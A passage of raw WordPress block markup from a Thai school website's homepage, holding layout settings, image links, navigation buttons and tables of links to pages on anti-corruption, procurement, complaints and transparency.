b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลสิ่งก่อสร้าง</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 